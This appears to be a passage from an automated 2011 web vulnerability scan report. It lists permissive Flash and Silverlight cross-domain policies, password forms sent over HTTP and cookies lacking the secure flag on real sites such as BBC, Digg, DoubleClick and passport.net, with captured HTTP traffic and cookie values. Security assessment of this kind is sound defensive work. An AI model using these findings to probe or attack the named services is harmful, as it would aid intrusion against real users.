<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.google.sk" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

3.12. http://newsrss.bbc.co.uk/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://newsrss.bbc.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: newsrss.bbc.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 20 Apr 2011 09:07:59 GMT
Content-Type: text/xml
Cache-Control: max-age=120
Expires: Wed, 06 Jul 2011 11:56:37 GMT
Date: Wed, 06 Jul 2011 11:54:37 GMT
Content-Length: 1081
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="downloads.bbc.co.uk" />
   <allow-access-from domain="www.bbcamerica.com" />
   <allow-access-from domain="*.bbcamerica.com" />
   <allow-access-from domain="www.bbc.co.uk" />
   <allow-access-from domain="news.bbc.co.uk" />
   <allow-access-from domain="newsimg.bbc.co.uk"/>
   <allow-access-from domain="nolpreview11.newsonline.tc.nca.bbc.co.uk" />
...[SNIP]...
<allow-access-from domain="newsapi.bbc.co.uk" />
   <allow-access-from domain="extdev.bbc.co.uk" />
   <allow-access-from domain="stats.bbc.co.uk" />
   <allow-access-from domain="*.bbc.co.uk"/>
   <allow-access-from domain="*.bbci.co.uk"/>
   <allow-access-from domain="*.bbc.com"/>
...[SNIP]...
<allow-access-from domain="jam.bbc.co.uk" />
   <allow-access-from domain="dc01.dc.bbc.co.uk" />
...[SNIP]...

3.13. http://api.twitter.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.twitter.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.twitter.com

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 14:02:30 GMT
Server: hi
Status: 200 OK
Last-Modified: Tue, 05 Jul 2011 19:19:41 GMT
Content-Type: application/xml
Content-Length: 561
Cache-Control: max-age=1800
Expires: Wed, 06 Jul 2011 14:32:30 GMT
Vary: Accept-Encoding
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="twitter.com" />
...[SNIP]...
<allow-access-from domain="search.twitter.com" />
   <allow-access-from domain="static.twitter.com" />
...[SNIP]...

4. Silverlight cross-domain policy
There are 3 instances of this issue:

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


4.1. http://ad.doubleclick.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Tue, 20 May 2008 22:28:37 GMT
Date: Wed, 06 Jul 2011 11:55:06 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

4.2. http://ecn.dev.virtualearth.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecn.dev.virtualearth.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ecn.dev.virtualearth.net

Response

HTTP/1.0 200 OK
Cache-Control: max-age=5443200
Content-Type: text/xml
Last-Modified: Thu, 16 Jun 2011 00:30:01 GMT
Accept-Ranges: bytes
ETag: "57c5b87bc2bcc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 06 Jul 2011 15:38:55 GMT
Content-Length: 374
Connection: close

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
<domain uri="http://*"/>
...[SNIP]...

4.3. http://profile.live.com/clientaccesspolicy.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://profile.live.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: profile.live.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/xml; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-Imf: 197a8481-8887-45ea-8ece-afbd16506d13
Set-Cookie: E=P:umIuReUJzog=:GJEjRxGdddMqyUcXEbDkHPosnhQDlAGYffAsX7wlFVE=:F; domain=.live.com; path=/
X-AspNet-Version: 4.0.30319
Set-Cookie: E=P:umIuReUJzog=:GJEjRxGdddMqyUcXEbDkHPosnhQDlAGYffAsX7wlFVE=:F; domain=.live.com; path=/
Set-Cookie: xidseq=2; domain=.live.com; path=/
Set-Cookie: LD=; domain=.live.com; expires=Wed, 06-Jul-2011 09:36:21 GMT; path=/
Set-Cookie: wla42=; domain=live.com; expires=Wed, 13-Jul-2011 11:16:21 GMT; path=/
Set-Cookie: sc_clustbl_142=b74b373a208052d8; domain=profile.live.com; expires=Fri, 05-Aug-2011 11:16:21 GMT; path=/
X-Powered-By: ASP.NET
X-Content-Type-Options: nosniff
X-MSNSERVER: H: BL2XXXXXC626 V: 1 D: 6/27/2011
Date: Wed, 06 Jul 2011 11:16:21 GMT
Connection: close
Content-Length: 400

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="http://msc.wlxrs.com"/>

...[SNIP]...

5. Cleartext submission of password
There are 10 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


5.1. http://digg.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: imp_id=be4697b47d58b1200ef3f6956c8cc49e2813419339d6fd7bb526092b66b1dc13; expires=Thu, 07-Jul-2011 11:37:07 GMT; path=/; domain=digg.com
X-Digg-Time: D=237528 10.2.129.225
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 101255

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- All Topics
- The Latest News Headlines, Videos and Images
</title>

<met
...[SNIP]...
</script><form class="hidden">
<input type="text" name="ident" value="" id="ident-saved">
<input type="password" name="password" value="" id="password-saved">
</form>
...[SNIP]...

5.2. http://digg.com/login

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /login

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /login HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=24276 10.2.129.225
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 8609

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology, headlin
...[SNIP]...
</ul>
<form id="login" method="post" action="/ajax/auth/prepare/digg" class="digg-form group invite-form">
<input type="hidden" name="sn" value="">
...[SNIP]...
</label>
<input type="password" name="password" class="text-input placeholder-input" tabindex="2" id="password">
</span>
...[SNIP]...

5.3. http://digg.com/login

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /login

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /login HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=24276 10.2.129.225
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 8609

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology, headlin
...[SNIP]...
</script><form class="hidden">
<input type="text" name="ident" value="" id="ident-saved">
<input type="password" name="password" value="" id="password-saved">
</form>
...[SNIP]...

5.4. http://digg.com/register

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /register

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /register HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=38879 10.2.129.225
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 10144

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology, headlin
...[SNIP]...
</ul>
<form id="register" method="post" action="/ajax/auth/register" class="digg-form group invite-form">
<input type="hidden" name="sn" value="">
...[SNIP]...
</label>
<input type="password" name="password-register" id="password-register" class="text-input placeholder-input" tabindex="3">
</span>
...[SNIP]...

5.5. http://digg.com/register

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /register

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /register HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=38879 10.2.129.225
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 10144

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology, headlin
...[SNIP]...
</script><form class="hidden">
<input type="text" name="ident" value="" id="ident-saved">
<input type="password" name="password" value="" id="password-saved">
</form>
...[SNIP]...

5.6. http://digg.com/search

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /search

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /search HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=27180 10.2.129.226
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 8308

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Search
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, pol
...[SNIP]...
</script><form class="hidden">
<input type="text" name="ident" value="" id="ident-saved">
<input type="password" name="password" value="" id="password-saved">
</form>
...[SNIP]...

5.7. http://digg.com/submit

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /submit?phase=2&url=https://www.microsoft.com/presspass/presskits/DCU/default.aspx HTTP/1.1
Host: digg.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:16:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=24761 10.2.128.235
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 8620

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics
...[SNIP]...
</script><form class="hidden">
<input type="text" name="ident" value="" id="ident-saved">
<input type="password" name="password" value="" id="password-saved">
</form>
...[SNIP]...

5.8. http://digg.com/topic

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /topic

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /topic HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=31422 10.2.129.226
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 12469

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology, headlin
...[SNIP]...
</script><form class="hidden">
<input type="text" name="ident" value="" id="ident-saved">
<input type="password" name="password" value="" id="password-saved">
</form>
...[SNIP]...

5.9. http://digg.com/upcoming

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /upcoming

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /upcoming HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:07 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: imp_id=d49aeb50a0490b4b7e1f800682c23d942b50abde233eda6a7b26c684f1cf95d6; expires=Thu, 07-Jul-2011 11:37:07 GMT; path=/; domain=digg.com
X-Digg-Time: D=300792 10.2.129.80
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 98962

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- All Topics
- Upcoming News Headlines, Videos and Images
</title>

<meta
...[SNIP]...
</script><form class="hidden">
<input type="text" name="ident" value="" id="ident-saved">
<input type="password" name="password" value="" id="password-saved">
</form>
...[SNIP]...

5.10. http://manage.softlayer.mobi/

Summary

Severity:   High
Confidence:   Certain
Host:   http://manage.softlayer.mobi
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: manage.softlayer.mobi
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:09 GMT
Server: Apache
Content-Length: 1832
Connection: close
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html>
<head>
<title>SoftLayer - Mobile Portal Login</title>
<link rel="stylesheet" type="text/css
...[SNIP]...
<center>
<form id="index_form" name="data[index][index?cacheKey=]_form" action="http://manage.softlayer.mobi/index/index?cacheKey=" method="post"> <center>
...[SNIP]...
<BR>
<input type="password" id="user_password" name="data[User][password]" style="font-size:x-small" class="logintext" tabIndex="2" size="10" /><BR>
...[SNIP]...

6. SSL cookie without secure flag set
There are 12 instances of this issue:

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.


6.1. https://accountservices.passport.net/gethip.srf

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://accountservices.passport.net
Path:   /gethip.srf

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gethip.srf?lc=1033&fid=2044200945&id=75046&fre=hard&type=visual HTTP/1.1
Host: accountservices.passport.net
Connection: keep-alive
Referer: https://accountservices.passport.net/uiresetpw.srf?mkt=EN-US&lc=1033&id=75046
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CkTst=G1309951137024

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 19932
Content-Type: text/html; charset=utf-8
Expires: Wed, 06 Jul 2011 11:20:14 GMT
Server: Microsoft-IIS/7.5
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
Set-Cookie: HIPSession=45S*6vuIWEDZGNM0*09htdJwOMobm7R5E2ZMW2RB2dSGkqC*apBp98w1vt43A3esAug*iHMBVLNvVAtuPikOTavfE!XPLQvoM*ecgi7xDXNJg$; domain=.passport.net;path=/;version=1
PPServer: PPV: 30 H: BAYIDSPROF1D05 V: 0
Date: Wed, 06 Jul 2011 11:21:13 GMT
Connection: close

var HIPM={name:"HIPM",innerFrame:null,comeinURLr:"",comeinURL:"",vv:"",eEmpty:"",eTooLong:"",eWrongAnswer:"",solutionElemt:"",afr:"audio",vfr:"visual",instruction:"",starttime:null,endtime:null,solnti
...[SNIP]...

6.2. https://ebanking.ubs.com/en/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ebanking.ubs.com
Path:   /en/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/ HTTP/1.1
Host: ebanking.ubs.com
Connection: keep-alive
Referer: http://www.ubs.com/1/e/online.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: www-stats=130ffb6627c.8526e520; NavLB_Www=www2.ubs.com; NavLB_PQ=quotes-public1.ubs.com; ubslang=en-US; WT_FPC=id=14.96.190.152-2611613264.30161891:lv=1309982088978:ss=1309981804815

Response

HTTP/1.1 302 Found
Date: Wed, 06 Jul 2011 13:59:55 GMT
Server: Apache
Pragma: no-cache
Set-Cookie: NavLB_EB=ebanking1.ubs.com; Domain=.ubs.com; Path=/; Version=1; HttpOnly
Connection: close
Location: https://ebanking1.ubs.com:443/en/?NavLB_EB=1309960795
Cache-Control: no-cache
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Content-Length: 286
Content-Type: text/html; charset=utf-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A
...[SNIP]...

6.3. https://live.zune.net/xweb/passport/bottomCB.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://live.zune.net
Path:   /xweb/passport/bottomCB.aspx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /xweb/passport/bottomCB.aspx HTTP/1.1
Host: live.zune.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
eid: e16080d6-37d3-4938-9cb2-f9f14681964f,7554
lx-exp: zunenet_music_buyButtonUX,Force,C
X-AspNet-Version: 2.0.50727
Set-Cookie: EXPAllTREATMENTS=zunenet_music_buyButtonUX=C; domain=.zune.net; expires=Wed, 06-Jul-2011 14:39:03 GMT; path=/
Set-Cookie: EXPCONTEXTHASZUNEPASS=False; domain=.zune.net; path=/
Set-Cookie: lastCulture=en-US; domain=.zune.net; expires=Tue, 06-Jul-2021 14:09:03 GMT; path=/
lx-svr: S803
X-Powered-By: ASP.NET
Date: Wed, 06 Jul 2011 14:09:03 GMT
Connection: close
Content-Length: 4813

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/20
...[SNIP]...

6.4. https://live.zune.net/xweb/passport/rightCB.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://live.zune.net
Path:   /xweb/passport/rightCB.aspx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /xweb/passport/rightCB.aspx HTTP/1.1
Host: live.zune.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
eid: b2db948c-3538-4620-8179-ed9314b7b5a4,734190
lx-exp: zunenet_music_buyButtonUX,Force,C
X-AspNet-Version: 2.0.50727
Set-Cookie: BSID=YJGgishn1FDOIHzbSuUPMCAIAABGs7BB5jvMASqQqOHLGf5OFjo09weF0q3UOnx8; domain=.zune.net; path=/
Set-Cookie: EXPAllTREATMENTS=zunenet_music_buyButtonUX=C; domain=.zune.net; expires=Wed, 06-Jul-2011 14:39:01 GMT; path=/
Set-Cookie: EXPCONTEXTHASZUNEPASS=False; domain=.zune.net; path=/
Set-Cookie: z_dto_minfo=; expires=Sun, 03-Jul-2011 14:09:01 GMT; path=/
Set-Cookie: supportedTuner=Undefined; path=/
Set-Cookie: z_email=; expires=Sun, 03-Jul-2011 14:09:01 GMT; path=/
Set-Cookie: lastCulture=en-US; domain=.zune.net; expires=Tue, 06-Jul-2021 14:09:01 GMT; path=/
lx-svr: S804
X-Powered-By: ASP.NET
Date: Wed, 06 Jul 2011 14:09:01 GMT
Connection: close
Content-Length: 5984

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/20
...[SNIP]...

6.5. https://live.zune.net/xweb/passport/topCB.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://live.zune.net
Path:   /xweb/passport/topCB.aspx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /xweb/passport/topCB.aspx HTTP/1.1
Host: live.zune.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
eid: e16080d6-37d3-4938-9cb2-f9f14681964f,7548
lx-exp: zunenet_music_buyButtonUX,Force,C
X-AspNet-Version: 2.0.50727
Set-Cookie: EXPAllTREATMENTS=zunenet_music_buyButtonUX=C; domain=.zune.net; expires=Wed, 06-Jul-2011 14:38:58 GMT; path=/
Set-Cookie: EXPCONTEXTHASZUNEPASS=False; domain=.zune.net; path=/
Set-Cookie: lastCulture=en-US; domain=.zune.net; expires=Tue, 06-Jul-2021 14:08:58 GMT; path=/
lx-svr: S803
X-Powered-By: ASP.NET
Date: Wed, 06 Jul 2011 14:08:57 GMT
Connection: close
Content-Length: 4616

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/20
...[SNIP]...

6.6. https://login.live.com/login.srf

Summary

Severity:   Information
Confidence:   Certain
